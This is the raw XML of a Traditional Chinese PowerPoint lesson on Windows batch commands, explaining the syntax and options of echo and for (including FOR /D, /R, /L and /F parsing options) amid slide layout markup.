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69"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8" d="100"/>
          <a:sy n="78"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936F89-5DFB-4173-8794-8308D55D066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FFFB789-4A58-4CBB-9C05-1BCD477BE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8B2F430-98C2-4554-86D9-73F3213C3E5D}"/>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E5FFDCFC-20B7-4AA5-A7F6-B21CC612C4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D2331DB-1848-48EE-8CAE-2D36D52A5298}"/>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143825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49043B-11EC-4131-A1F8-AE8A0786857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AE3370C-B1D1-4D02-A389-7938B04BB07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4B6517-69F2-4D98-8C71-9DC37B17CD21}"/>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97F8DE90-D994-4857-8EAD-05A12EBB314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645C773-E3CC-4CF2-A875-B5EFCE7380DD}"/>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346855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D2170F-BCD6-4A8E-9F37-ACC056650FF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CF8457-072B-46E8-81E1-F9A55A5101B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ACDDE6-F7FA-49C6-A85C-69B78002A1B7}"/>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DD466F49-948E-44C0-B528-2807E073B0D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9855132-1F6B-4114-B0BF-D8C735D62E8C}"/>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20054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19A751-7788-401F-AC9F-95CD6EFFE18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D5C213-8954-40EC-B4C3-448C9CEDA03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4DC4CE-B651-41FF-88C3-AEC7DDBF2AEB}"/>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C687E927-8DDD-4C27-8B71-C27E083F56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266774-6B89-403D-9DDB-F9694A88F6A2}"/>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246629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143CE8-A0F4-4184-8128-BE20684A740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A4BBEC0-041D-4C3E-B86A-B73CCE8F1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0C0A9BB-BFAE-4171-800D-7C7683F8DFAD}"/>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8876D376-FC42-408F-95B2-B317B86B3E1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CEA5B94-9200-4DCA-961D-6D07C25986E4}"/>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218431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F3B614-9504-4704-93C1-6257DC393B8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40DDDD-7D02-4F6B-B6F6-D9DD67F0880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4C46127-6BFD-4198-A6BE-47491B836AC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C6C59F1-ADC5-42A3-8674-AEED55A431E7}"/>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6" name="頁尾版面配置區 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4240D9F-DBB3-47FE-B097-A3E38D97D2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C04CBD-D1C5-4E10-8371-04DBAC7D5A04}"/>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27000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29A29-B687-45CE-8D83-C734EDCDA15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122061-B36D-44B4-8E1A-65F4E1588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DCE762B-A30D-4120-996E-71B54FF781B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5F0450A-33F3-4CCC-B100-EE43BEE25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DB94A02-3E91-4738-9D1C-5D3E8683286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2DA2DEC-AE1D-41F7-A0D5-69D3CD2965D2}"/>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8" name="頁尾版面配置區 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B60664-44D3-40A8-90FF-FDD71ED1503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B67B65F-A445-4F4D-A8B7-8293919A081A}"/>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165044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F1372D-DB0B-432F-9CE1-E8B0CA8CB79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F70133A-9E74-47B1-A110-2919834D0DAB}"/>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4" name="頁尾版面配置區 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D8026C1-9D4F-4248-900C-6CD89AF2E0D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C9BBC32-0B2C-43B2-88D0-E022369D1F29}"/>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39042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5726A6A-A0E5-40AB-A95B-C748813369B2}"/>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3" name="頁尾版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD052BAB-27E4-4C29-9B64-B7D36EA3509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4F8C47-C0AD-4A7B-8707-10B892A5A813}"/>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351792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D75DA-6AC8-4985-BFC0-E8010DEDCBA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941A789-73A9-4684-A36F-E32775204D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0369BFF-9C49-433B-A5EE-20085ABF1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AB47131-20A1-4627-89AD-C4D8FC62C485}"/>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6" name="頁尾版面配置區 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6160762-48A0-49F2-9B6E-E22F527F4A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5885607-6310-435A-945C-EC5030C81686}"/>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161979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F185D-7CA6-4389-8724-F4364210A2A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CAB6ABE-17B8-4C6F-9A80-689F35B80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12D3F81-E4D6-4A61-8534-5D9D11D3C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B144FB-9157-412B-8D11-6BAF9A23404D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F55DBE59-5899-4396-8786-5B9DB38C51DC}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/9/14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="頁尾版面配置區 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EAB581B-D016-46C2-901A-5F022C9FBFE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C9CD806-A935-4D8A-A2A6-D47665FAA085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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104548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87E99D3-816F-4FC6-92D6-AD9D60AFB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933BB5D-2BE6-45F6-BA82-9EA01EBD33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D00AF5-1CE8-41F1-868F-C8640C6CE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DBE59-5899-4396-8786-5B9DB38C51DC}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/9/14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="頁尾版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D632B44-F6E5-46DE-8345-FBA73300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18CD71F-C7C0-43E4-8C11-263522C11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B3374-A800-46D6-AC4F-FFF7C4D55D49}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400818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eres.pixnet.net/blog/post/4205834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heres.pixnet.net/blog/post/4205834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E32F72A-4081-4FA8-B81A-ABE2F39E1CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="內容版面配置區 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45BFFC1E-635B-4382-B3AF-96DE50B7785D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>打開回顯或關閉請求回顯功能，或顯示消息。如果沒有任何參數，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令將顯示當前回顯設置。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>語法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echo [{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>on|off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>}] [message]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@echo off / echo hello world</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在實際應用中我們會把這條命令和重定向符號（也稱為管道符號，一般用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&gt; &gt;&gt; ^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）結合來實現輸入一些命令到特定格式的文件中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這將在以後的例子中體現出來。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227119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AC5E8D-07D5-4E99-9507-5B160A31C632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A3495A8-E38F-4616-8A46-F404F1495DD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令是一個比較複雜的命令，主要用於參數在指定的範圍內循環執行命令。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在批處理文件中使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令時，指定變量請使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%%variable</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for {%variable|%%variable} in (set) do command [ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>CommandLineOptions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指定一個單一字母可替換的參數。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(set) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指定一個或一組文件。可以使用通配符。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指定對每個文件執行的命令。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>command-parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為特定命令指定參數或命令行開關。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在批處理文件中使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令時，指定變量請使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%%variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>而不要用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。變量名稱是區分大小寫的，所以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不同於 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378179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5078C33-C58A-4F8B-84EE-950D4F3CC87A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="430306"/>
            <a:ext cx="10515600" cy="5746657"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如果命令擴展名被啟用，下列額外的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令格式會受到</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</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FOR /D %variable IN (set) DO command [command-parameters]</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如果集中包含通配符，則指定與目錄名匹配，而不與文件名匹配。</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FOR /R [[drive:]path] %variable IN (set) DO command [command-</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檢查以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[drive:]path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為根的目錄樹，指向每個目錄中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>語句。如果在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後沒有指定目錄，則使用當前目錄。如果集僅為一個單點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(.)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>字符，則枚舉該目錄樹。</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FOR /L %variable IN (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>start,step,end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) DO command [command-para</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該集表示以增量形式從開始到結束的一個數字序列。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>因此，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(1,1,5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將產生序列 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1 2 3 4 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(5,-1,1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將產生</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>序列 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(5 4 3 2 1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="351315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04B79F-8AE9-4AB8-8F71-29E8FBFDAF55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="555812"/>
            <a:ext cx="10515600" cy="5621151"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR /F [\options\] %variable IN (file-set) DO command</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR /F [\options\] %variable IN (\string\) DO command</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR /F [\options\] %variable IN (command) DO command</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或者，如果有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>usebackq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</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FOR /F [\options\] %variable IN (file-set) DO command</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR /F [\options\] %variable IN (\string\) DO command</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR /F [\options\] %variable IN (command) DO command</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err="1"/>
              <a:t>filenameset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為一個或多個文件名。繼續到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>filenameset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中的下一個文件之前，每份文件都已被打開、讀取並經過處理。處理包括讀取文件，將其分成一行行的文字，然後將每行解析成零或更多的符號。然後用已找到的符號字符串變量值調用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>循環。以默認方式，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>通過每個文件的每一行中分開的第一個空白符號。跳過空白行。您可通過指定可選 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>\options\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>參數替代默認解析操作。這個帶引號的字符串包括一個或多個指定不同解析選項的關鍵字。這些關鍵字為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</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err="1"/>
              <a:t>eol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>=c - </a:t>
            </a:r>
